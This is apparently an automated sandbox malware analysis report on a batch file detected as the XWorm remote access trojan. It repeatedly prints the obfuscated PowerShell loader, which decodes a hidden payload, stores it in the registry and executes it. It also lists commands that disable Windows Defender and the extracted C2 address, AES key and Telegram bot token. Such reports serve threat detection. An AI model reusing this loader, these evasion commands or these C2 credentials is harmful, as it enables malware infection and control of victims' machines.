Edit tour

Windows Analysis Report
georgefloyd.bat

Overview

General Information

Sample name:	georgefloyd.bat
Analysis ID:	1631918
MD5:	c827b11ddab8f04af88ad75cf10ce5c3
SHA1:	8ccd314ee72a96772cc6040e9c626332a18ff2d0
SHA256:	e3f141aeea820a23216db5919e80573b1e5675e98a3c02a67d2e7b576ef269b5
Tags:	batcf-prod-cap--cfduser-JAMESWT_MHT
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

C2 URLs / IPs found in malware configuration

Contains functionality to log keystrokes (.Net Source)

Encrypted powershell cmdline option found

Found large BAT file

Joe Sandbox ML detected suspicious sample

Performs an instant shutdown (NtRaiseHardError)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Sigma detected: Suspicious PowerShell Parameter Substring

Suspicious powershell command line found

Uses the Telegram API (likely for C&C communication)

Yara detected Costura Assembly Loader

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sigma detected: Suspicious Execution of Powershell with Base64

Stores large binary data to the registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

cmd.exe (PID: 2780 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\georgefloyd.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 332 cmdline: powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:tMHryVWCxy;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7632 cmdline: powershell.exe -windowstyle hidden -ec aQBOAFYAbwBLAGUALQBlAFgAcABSAGUAUwBzAEkAbwBuACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACcAIAAtAE4AYQBtAGUAIAAnACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACcAKQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABgACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACkA MD5: 04029E121A0CFA5991749937DD22A1D9)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://cyber.wtf/2025/02/12/unpacking-pyarmor-v8-scripts/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["193.32.177.63"], "Port": 6000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "7238632531:AAGCQZAh03hAwOcuP9HUeoAP5AQV0o0tp24", "Telegram Chatid": "8080837794", "Version": "XWorm V5.2"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_XWorm_1	Yara detected XWorm	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.2338047448.00000243022FB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000B.00000002.1553871152.0000022819A6F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000003.00000002.2718136098.0000024311715000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000003.00000002.2338047448.00000243022CB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000B.00000002.1553871152.0000022819B39000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000B.00000002.1553871152.0000022819B39000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x1bfd9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x25619:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x2b6ec:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1c076:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x256b6:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2b7a4:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1c18b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x257cb:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x2b8d4:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1bc87:$cnc4: POST / HTTP/1.1 0x252c7:$cnc4: POST / HTTP/1.1
0000000B.00000002.1553871152.000002281B5C4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000003.00000002.2718136098.0000024310CFB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: powershell.exe PID: 332	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: powershell.exe PID: 332	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: powershell.exe PID: 332	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: powershell.exe PID: 332	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x9eec33:$b2: ::FromBase64String( 0x1e157f:$s1: -join 0x7eb41a:$s1: -join 0x7ee149:$s1: -join 0x7fd1d4:$s1: -join 0x80a2a9:$s1: -join 0x80d67b:$s1: -join 0x80dd2d:$s1: -join 0x80f81e:$s1: -join 0x811a24:$s1: -join 0x81224b:$s1: -join 0x812abb:$s1: -join 0x8131f6:$s1: -join 0x813228:$s1: -join 0x813270:$s1: -join 0x81328f:$s1: -join 0x813adf:$s1: -join 0x813c5b:$s1: -join 0x813cd3:$s1: -join 0x813d66:$s1: -join 0x813fcc:$s1: -join
Process Memory Space: powershell.exe PID: 7632	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: powershell.exe PID: 7632	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.powershell.exe.24302f3c610.0.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x2a11:$reg1: SOFTWARE\Microsoft\Windows Defender\Features 0x2a91:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x2b16:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4c9a:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4d59:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4dd9:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4fa1:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x2faf:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutuser $true 0x3067:$s2: Set-MpPreference -DisableArchiveScanning $true 0x3107:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true 0x31a5:$s4: Set-MpPreference -DisableScriptScanning $true 0x322f:$s5: Set-MpPreference -SubmitSamplesConsent 2 0x329d:$s6: Set-MpPreference -MAPSReporting 0 0x3315:$s7: Set-MpPreference -HighThreatDefaultAction 6 0x33b3:$s8: Set-MpPreference -ModerateThreatDefaultAction 6 0x3441:$s9: Set-MpPreference -LowThreatDefaultAction 6 0x34cb:$s10: Set-MpPreference -SevereThreatDefaultAction 6 0x3622:$e2: Add-MpPreference -ExclusionPath
3.2.powershell.exe.24302f46890.1.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x2a11:$reg1: SOFTWARE\Microsoft\Windows Defender\Features 0x2a91:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x2b16:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4c9a:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4d59:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4dd9:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4fa1:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x2faf:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutuser $true 0x3067:$s2: Set-MpPreference -DisableArchiveScanning $true 0x3107:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true 0x31a5:$s4: Set-MpPreference -DisableScriptScanning $true 0x322f:$s5: Set-MpPreference -SubmitSamplesConsent 2 0x329d:$s6: Set-MpPreference -MAPSReporting 0 0x3315:$s7: Set-MpPreference -HighThreatDefaultAction 6 0x33b3:$s8: Set-MpPreference -ModerateThreatDefaultAction 6 0x3441:$s9: Set-MpPreference -LowThreatDefaultAction 6 0x34cb:$s10: Set-MpPreference -SevereThreatDefaultAction 6 0x3622:$e2: Add-MpPreference -ExclusionPath
11.2.powershell.exe.22819b56788.6.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.2.powershell.exe.22819b56788.6.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x6718:$str01: $VB$Local_Port 0x6709:$str02: $VB$Local_Host 0x6994:$str03: get_Jpeg 0x63f4:$str04: get_ServicePack 0x75b3:$str05: Select * from AntivirusProduct 0x77b1:$str06: PCRestart 0x77c5:$str07: shutdown.exe /f /r /t 0 0x7877:$str08: StopReport 0x784d:$str09: StopDDos 0x794f:$str10: sendPlugin 0x7afb:$str12: -ExecutionPolicy Bypass -File " 0x7c24:$str13: Content-length: 5235
11.2.powershell.exe.22819b56788.6.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7e91:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xdf64:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7f2e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xe01c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8043:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xe14c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7b3f:$cnc4: POST / HTTP/1.1
11.2.powershell.exe.22819b4d148.4.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.2.powershell.exe.22819b4d148.4.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x4918:$str01: $VB$Local_Port 0x4909:$str02: $VB$Local_Host 0x4b94:$str03: get_Jpeg 0x45f4:$str04: get_ServicePack 0x57b3:$str05: Select * from AntivirusProduct 0x59b1:$str06: PCRestart 0x59c5:$str07: shutdown.exe /f /r /t 0 0x5a77:$str08: StopReport 0x5a4d:$str09: StopDDos 0x5b4f:$str10: sendPlugin 0x5cfb:$str12: -ExecutionPolicy Bypass -File " 0x5e24:$str13: Content-length: 5235
11.2.powershell.exe.22819b4d148.4.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6091:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x612e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6243:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x5d3f:$cnc4: POST / HTTP/1.1
3.2.powershell.exe.24302f46890.1.raw.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x4811:$reg1: SOFTWARE\Microsoft\Windows Defender\Features 0x4891:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4916:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x6a9a:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x6b59:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x6bd9:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x6da1:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4daf:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutuser $true 0x4e67:$s2: Set-MpPreference -DisableArchiveScanning $true 0x4f07:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true 0x4fa5:$s4: Set-MpPreference -DisableScriptScanning $true 0x502f:$s5: Set-MpPreference -SubmitSamplesConsent 2 0x509d:$s6: Set-MpPreference -MAPSReporting 0 0x5115:$s7: Set-MpPreference -HighThreatDefaultAction 6 0x51b3:$s8: Set-MpPreference -ModerateThreatDefaultAction 6 0x5241:$s9: Set-MpPreference -LowThreatDefaultAction 6 0x52cb:$s10: Set-MpPreference -SevereThreatDefaultAction 6 0x5422:$e2: Add-MpPreference -ExclusionPath
3.2.powershell.exe.24311715540.7.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.powershell.exe.24311023810.3.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
11.2.powershell.exe.22819b4d148.4.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.2.powershell.exe.22819b4d148.4.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x6718:$str01: $VB$Local_Port 0xfd58:$str01: $VB$Local_Port 0x6709:$str02: $VB$Local_Host 0xfd49:$str02: $VB$Local_Host 0x6994:$str03: get_Jpeg 0xffd4:$str03: get_Jpeg 0x63f4:$str04: get_ServicePack 0xfa34:$str04: get_ServicePack 0x75b3:$str05: Select * from AntivirusProduct 0x10bf3:$str05: Select * from AntivirusProduct 0x77b1:$str06: PCRestart 0x10df1:$str06: PCRestart 0x77c5:$str07: shutdown.exe /f /r /t 0 0x10e05:$str07: shutdown.exe /f /r /t 0 0x7877:$str08: StopReport 0x10eb7:$str08: StopReport 0x784d:$str09: StopDDos 0x10e8d:$str09: StopDDos 0x794f:$str10: sendPlugin 0x10f8f:$str10: sendPlugin 0x7afb:$str12: -ExecutionPolicy Bypass -File "
11.2.powershell.exe.22819b4d148.4.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7e91:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x114d1:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x175a4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7f2e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1156e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1765c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8043:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x11683:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1778c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7b3f:$cnc4: POST / HTTP/1.1 0x1117f:$cnc4: POST / HTTP/1.1
3.2.powershell.exe.24310fe37d8.6.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.powershell.exe.24302f3c610.0.raw.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x4811:$reg1: SOFTWARE\Microsoft\Windows Defender\Features 0xea91:$reg1: SOFTWARE\Microsoft\Windows Defender\Features 0x4891:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4916:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x6a9a:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x6b59:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x6bd9:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x6da1:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0xeb11:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0xeb96:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x10d1a:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x10dd9:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x10e59:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x11021:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4daf:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutuser $true 0xf02f:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutuser $true 0x4e67:$s2: Set-MpPreference -DisableArchiveScanning $true 0xf0e7:$s2: Set-MpPreference -DisableArchiveScanning $true 0x4f07:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true 0xf187:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true 0x4fa5:$s4: Set-MpPreference -DisableScriptScanning $true
11.2.powershell.exe.22819b56788.6.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.2.powershell.exe.22819b56788.6.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x4918:$str01: $VB$Local_Port 0x4909:$str02: $VB$Local_Host 0x4b94:$str03: get_Jpeg 0x45f4:$str04: get_ServicePack 0x57b3:$str05: Select * from AntivirusProduct 0x59b1:$str06: PCRestart 0x59c5:$str07: shutdown.exe /f /r /t 0 0x5a77:$str08: StopReport 0x5a4d:$str09: StopDDos 0x5b4f:$str10: sendPlugin 0x5cfb:$str12: -ExecutionPolicy Bypass -File " 0x5e24:$str13: Content-length: 5235
11.2.powershell.exe.22819b56788.6.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6091:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x612e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6243:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x5d3f:$cnc4: POST / HTTP/1.1
3.2.powershell.exe.243110a3848.5.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.powershell.exe.24311715540.7.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.powershell.exe.24311023810.3.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.powershell.exe.243110a3848.5.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.powershell.exe.24310fe37d8.6.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Click to see the 19 entries

Other

Source	Rule	Description	Author	Strings
amsi64_332.amsi.csv	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xea3d:$b2: ::FromBase64String( 0x91:$s1: -join 0x196:$s1: -join 0xbb26:$s1: -join 0x52d2:$s4: += 0x5394:$s4: += 0x95bb:$s4: += 0xb6d8:$s4: += 0xb9c2:$s4: += 0xbb08:$s4: += 0xdd20:$s4: += 0xdda0:$s4: += 0xde66:$s4: += 0xdee6:$s4: += 0xe0bc:$s4: += 0xe140:$s4: += 0xc209:$e4: Get-WmiObject 0xc3f8:$e4: Get-Process 0xc450:$e4: Start-Process

Sigma Signatures

System Summary

Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation

Source: Process started

Author: Thomas Patzke: Data: Command: powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:tMHryVWCxy;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression", CommandLine: powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:tMHryVWCxy;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\georgefloyd.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2780, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:tMHryVWCxy;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression", ProcessId: 332, ProcessName: powershell.exe

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:tMHryVWCxy;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression", CommandLine: powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:tMHryVWCxy;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression", 